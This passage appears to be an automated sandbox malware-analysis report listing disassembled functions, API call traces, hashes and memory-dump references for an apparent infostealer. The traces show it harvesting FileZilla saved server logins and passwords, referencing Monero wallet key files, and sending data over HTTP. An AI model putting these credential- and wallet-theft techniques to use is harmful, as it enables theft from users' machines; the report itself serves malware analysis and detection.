                  • Associated: 00000000.00000002.1714337528.0000000001492000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001499000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714621077.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714730643.0000000001643000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714747116.0000000001644000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: @~}
                  • API String ID: 0-3301823823
                  • Opcode ID: 0dd63986985e70e2d2f5e2eb96084f1c6852965465e648d2333d08cfe755f6dd
                  • Instruction ID: 93c8e8e342174d88a42d4335e60623b3a092a25b9f4d5910cc7fb9ab635f0bcc
                  • Opcode Fuzzy Hash: 0dd63986985e70e2d2f5e2eb96084f1c6852965465e648d2333d08cfe755f6dd
                  • Instruction Fuzzy Hash: 6651E6F3A083049BE350AE69DC8476AB7E6EFD4310F1A853CDAC487384E6395C058787
                  Function 0132DAEF Relevance: .2, Instructions: 189COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714337528.000000000120E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  • Associated: 00000000.00000002.1714174137.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000146E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001492000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001499000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714621077.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714730643.0000000001643000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714747116.0000000001644000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: bcd657e8244082c9079923be3e9c45395c37d52b04fc04bb26f9d8757637b2fc
                  • Instruction ID: f7ff986d6906fe6fa1f2662115ab9154ac4627e15fd434e46c4fcb4640773943
                  • Opcode Fuzzy Hash: bcd657e8244082c9079923be3e9c45395c37d52b04fc04bb26f9d8757637b2fc
                  • Instruction Fuzzy Hash: 595106B3A192105BF314996DEC84BBBB7DADBD4321F26863DEEC497784D9780C0186D2
                  Function 012F42D8 Relevance: .2, Instructions: 188COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714337528.000000000120E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  • Associated: 00000000.00000002.1714174137.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000146E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001492000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001499000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714621077.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714730643.0000000001643000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714747116.0000000001644000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: b4e7d89e7fdf1013fafb097c739582b69cf214a8d8fdfe1bec1dd071000b969d
                  • Instruction ID: 488ee91f1ffa86a6db90521351a7283d1154de6222dcc15dc09bb08fc4292a60
                  • Opcode Fuzzy Hash: b4e7d89e7fdf1013fafb097c739582b69cf214a8d8fdfe1bec1dd071000b969d
                  • Instruction Fuzzy Hash: 1F516AB37087084FE304697EED8973ABBDADBD0320F27863ED68493794E97558058286
                  Function 01279E67 Relevance: .1, Instructions: 136COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714337528.000000000120E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  • Associated: 00000000.00000002.1714174137.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000146E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001492000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001499000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714621077.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714730643.0000000001643000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714747116.0000000001644000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 4f44f479de9d1088eb814c4faa97b3c2ebcaafb90c5ee941652d38aaf28d2e1c
                  • Instruction ID: 249efd6b923b96dd074d53352da7c973cf3492db126d1bddb0617c058e55e653
                  • Opcode Fuzzy Hash: 4f44f479de9d1088eb814c4faa97b3c2ebcaafb90c5ee941652d38aaf28d2e1c
                  • Instruction Fuzzy Hash: 6A4129B3A041145BE3009A3EDC84727BAAAEFD4720F2AC13DDA9897348E93559064796
                  Function 01225806 Relevance: .1, Instructions: 129COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714337528.000000000120E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  • Associated: 00000000.00000002.1714174137.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000146E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001492000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001499000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714621077.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714730643.0000000001643000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714747116.0000000001644000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 287d6bc8398d43f98f96cbc0459faeefbb6ab4bc05403d898e3fe38b6ea16759
                  • Instruction ID: e76c467c11f30f410bd408785b5cec322c5d32475db3104f316acb918aa5188e
                  • Opcode Fuzzy Hash: 287d6bc8398d43f98f96cbc0459faeefbb6ab4bc05403d898e3fe38b6ea16759
                  • Instruction Fuzzy Hash: 8F41CFF39086008FF3546E29DC8577ABBE6EB94320F164A3CDFC5937C4DA3918468646
                  Function 00FC9750 Relevance: .0, Instructions: 15COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  • Associated: 00000000.00000002.1714174137.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000146E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001492000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001499000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714621077.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714730643.0000000001643000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714747116.0000000001644000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                  • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                  • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                  • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                  Function 00FC0250 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366stringmemoryCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00FCA740: lstrcpy.KERNEL32(00FD0E17,00000000), ref: 00FCA788
                    • Part of subcall function 00FC8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00FC8E0B
                    • Part of subcall function 00FCA920: lstrcpy.KERNEL32(00000000,?), ref: 00FCA972
                    • Part of subcall function 00FCA920: lstrcat.KERNEL32(00000000), ref: 00FCA982
                    • Part of subcall function 00FCA8A0: lstrcpy.KERNEL32(?,00FD0E17), ref: 00FCA905
                    • Part of subcall function 00FCA9B0: lstrlen.KERNEL32(?,00C89158,?,\Monero\wallet.keys,00FD0E17), ref: 00FCA9C5
                    • Part of subcall function 00FCA9B0: lstrcpy.KERNEL32(00000000), ref: 00FCAA04
                    • Part of subcall function 00FCA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FCAA12
                    • Part of subcall function 00FCA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00FCA7E6
                    • Part of subcall function 00FB99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00FB99EC
                    • Part of subcall function 00FB99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00FB9A11
                    • Part of subcall function 00FB99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00FB9A31
                    • Part of subcall function 00FB99C0: ReadFile.KERNEL32(000000FF,?,00000000,00FB148F,00000000), ref: 00FB9A5A
                    • Part of subcall function 00FB99C0: LocalFree.KERNEL32(00FB148F), ref: 00FB9A90
                    • Part of subcall function 00FB99C0: CloseHandle.KERNEL32(000000FF), ref: 00FB9A9A
                    • Part of subcall function 00FC8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00FC8E52
                  • GetProcessHeap.KERNEL32(00000000,000F423F,00FD0DBA,00FD0DB7,00FD0DB6,00FD0DB3), ref: 00FC0362
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00FC0369
                  • StrStrA.SHLWAPI(00000000,<Host>), ref: 00FC0385
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00FD0DB2), ref: 00FC0393
                  • StrStrA.SHLWAPI(00000000,<Port>), ref: 00FC03CF
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00FD0DB2), ref: 00FC03DD
                  • StrStrA.SHLWAPI(00000000,<User>), ref: 00FC0419
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00FD0DB2), ref: 00FC0427
                  • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00FC0463
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00FD0DB2), ref: 00FC0475
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00FD0DB2), ref: 00FC0502
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00FD0DB2), ref: 00FC051A
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00FD0DB2), ref: 00FC0532
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00FD0DB2), ref: 00FC054A
                  • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00FC0562
                  • lstrcat.KERNEL32(?,profile: null), ref: 00FC0571
                  • lstrcat.KERNEL32(?,url: ), ref: 00FC0580
                  • lstrcat.KERNEL32(?,00000000), ref: 00FC0593
                  • lstrcat.KERNEL32(?,00FD1678), ref: 00FC05A2
                  • lstrcat.KERNEL32(?,00000000), ref: 00FC05B5
                  • lstrcat.KERNEL32(?,00FD167C), ref: 00FC05C4
                  • lstrcat.KERNEL32(?,login: ), ref: 00FC05D3
                  • lstrcat.KERNEL32(?,00000000), ref: 00FC05E6
                  • lstrcat.KERNEL32(?,00FD1688), ref: 00FC05F5
                  • lstrcat.KERNEL32(?,password: ), ref: 00FC0604
                  • lstrcat.KERNEL32(?,00000000), ref: 00FC0617
                  • lstrcat.KERNEL32(?,00FD1698), ref: 00FC0626
                  • lstrcat.KERNEL32(?,00FD169C), ref: 00FC0635
                  • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00FD0DB2), ref: 00FC068E
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  • Associated: 00000000.00000002.1714174137.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000146E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001492000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001499000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714621077.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714730643.0000000001643000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714747116.0000000001644000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                  • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                  • API String ID: 1942843190-555421843
                  • Opcode ID: 52121a7dbcd430f6f27f89a30b2897f639e8971a99a3bd36e3bef2b0a1ccd494
                  • Instruction ID: fc20df5b47852734d2ee4a7f0845cab82e54fd7092368ee667e99027a09c1c79
                  • Opcode Fuzzy Hash: 52121a7dbcd430f6f27f89a30b2897f639e8971a99a3bd36e3bef2b0a1ccd494
                  • Instruction Fuzzy Hash: F6D15A71900109ABCB08EBE0DE96FEE7739BF14304F44452DF116A7185EE78BA46EB61
                  Function 00FB5960 Relevance: 39.0, APIs: 17, Strings: 5, Instructions: 495networkstringmemoryCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00FCA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00FCA7E6
                    • Part of subcall function 00FB47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00FB4839
                    • Part of subcall function 00FB47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00FB4849
                    • Part of subcall function 00FCA740: lstrcpy.KERNEL32(00FD0E17,00000000), ref: 00FCA788
                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00FB59F8
                  • StrCmpCA.SHLWAPI(?,00C8EAA8), ref: 00FB5A13
                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00FB5B93
                  • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,00C8EAE8,00000000,?,00C8A480,00000000,?,00FD1A1C), ref: 00FB5E71
                  • lstrlen.KERNEL32(00000000), ref: 00FB5E82
                  • GetProcessHeap.KERNEL32(00000000,?), ref: 00FB5E93
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00FB5E9A
                  • lstrlen.KERNEL32(00000000), ref: 00FB5EAF
                  • lstrlen.KERNEL32(00000000), ref: 00FB5ED8
                  • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00FB5EF1
                  • lstrlen.KERNEL32(00000000,?,?), ref: 00FB5F1B
                  • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00FB5F2F
                  • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00FB5F4C
                  • InternetCloseHandle.WININET(00000000), ref: 00FB5FB0
                  • InternetCloseHandle.WININET(00000000), ref: 00FB5FBD
                  • HttpOpenRequestA.WININET(00000000,00C8E988,?,00C8E368,00000000,00000000,00400100,00000000), ref: 00FB5BF8
                    • Part of subcall function 00FCA9B0: lstrlen.KERNEL32(?,00C89158,?,\Monero\wallet.keys,00FD0E17), ref: 00FCA9C5
                    • Part of subcall function 00FCA9B0: lstrcpy.KERNEL32(00000000), ref: 00FCAA04
                    • Part of subcall function 00FCA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FCAA12
                    • Part of subcall function 00FCA8A0: lstrcpy.KERNEL32(?,00FD0E17), ref: 00FCA905
                    • Part of subcall function 00FCA920: lstrcpy.KERNEL32(00000000,?), ref: 00FCA972
                    • Part of subcall function 00FCA920: lstrcat.KERNEL32(00000000), ref: 00FCA982
                  • InternetCloseHandle.WININET(00000000), ref: 00FB5FC7
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  • Associated: 00000000.00000002.1714174137.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000146E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001492000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001499000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714621077.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714730643.0000000001643000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714747116.0000000001644000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                  • String ID: "$"$------$------$------
                  • API String ID: 874700897-2180234286
                  • Opcode ID: f42541e54188bdba1cedaa1cc486f19ce33c07e631009e0d3e24c4bebf7be1a1
                  • Instruction ID: 7b2dc6169614baa75a70efeee9b0d5bfaa9a276a9c7836ec8ea66625563c842e
                  • Opcode Fuzzy Hash: f42541e54188bdba1cedaa1cc486f19ce33c07e631009e0d3e24c4bebf7be1a1
                  • Instruction Fuzzy Hash: 62121C7182011DABDB18EBA0DD96FEEB338BF14704F5041ADB10A62091EF787A49DF65
                  Function 00FBCEF0 Relevance: 30.4, APIs: 20, Instructions: 375stringmemoryfileCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00FCA740: lstrcpy.KERNEL32(00FD0E17,00000000), ref: 00FCA788
                    • Part of subcall function 00FCA9B0: lstrlen.KERNEL32(?,00C89158,?,\Monero\wallet.keys,00FD0E17), ref: 00FCA9C5
                    • Part of subcall function 00FCA9B0: lstrcpy.KERNEL32(00000000), ref: 00FCAA04
                    • Part of subcall function 00FCA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FCAA12
                    • Part of subcall function 00FCA8A0: lstrcpy.KERNEL32(?,00FD0E17), ref: 00FCA905
                    • Part of subcall function 00FC8B60: GetSystemTime.KERNEL32(00FD0E1A,00C8A450,00FD05AE,?,?,00FB13F9,?,0000001A,00FD0E1A,00000000,?,00C89158,?,\Monero\wallet.keys,00FD0E17), ref: 00FC8B86
                    • Part of subcall function 00FCA920: lstrcpy.KERNEL32(00000000,?), ref: 00FCA972
                    • Part of subcall function 00FCA920: lstrcat.KERNEL32(00000000), ref: 00FCA982
                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00FBCF83
                  • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00FBD0C7
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00FBD0CE
                  • lstrcat.KERNEL32(?,00000000), ref: 00FBD208
                  • lstrcat.KERNEL32(?,00FD1478), ref: 00FBD217
                  • lstrcat.KERNEL32(?,00000000), ref: 00FBD22A
                  • lstrcat.KERNEL32(?,00FD147C), ref: 00FBD239
                  • lstrcat.KERNEL32(?,00000000), ref: 00FBD24C
                  • lstrcat.KERNEL32(?,00FD1480), ref: 00FBD25B
                  • lstrcat.KERNEL32(?,00000000), ref: 00FBD26E
                  • lstrcat.KERNEL32(?,00FD1484), ref: 00FBD27D
                  • lstrcat.KERNEL32(?,00000000), ref: 00FBD290
                  • lstrcat.KERNEL32(?,00FD1488), ref: 00FBD29F
                  • lstrcat.KERNEL32(?,00000000), ref: 00FBD2B2
                  • lstrcat.KERNEL32(?,00FD148C), ref: 00FBD2C1
                  • lstrcat.KERNEL32(?,00000000), ref: 00FBD2D4
                  • lstrcat.KERNEL32(?,00FD1490), ref: 00FBD2E3
                    • Part of subcall function 00FCA820: lstrlen.KERNEL32(00FB4F05,?,?,00FB4F05,00FD0DDE), ref: 00FCA82B
                    • Part of subcall function 00FCA820: lstrcpy.KERNEL32(00FD0DDE,00000000), ref: 00FCA885
                  • lstrlen.KERNEL32(?), ref: 00FBD32A
                  • lstrlen.KERNEL32(?), ref: 00FBD339
                    • Part of subcall function 00FCAA70: StrCmpCA.SHLWAPI(00C890C8,00FBA7A7,?,00FBA7A7,00C890C8), ref: 00FCAA8F
                  • DeleteFileA.KERNEL32(00000000), ref: 00FBD3B4
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  • Associated: 00000000.00000002.1714174137.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000146E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001492000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001499000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714621077.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714730643.0000000001643000.00000040.00000001.01000000.00000003.sdmpDownload File
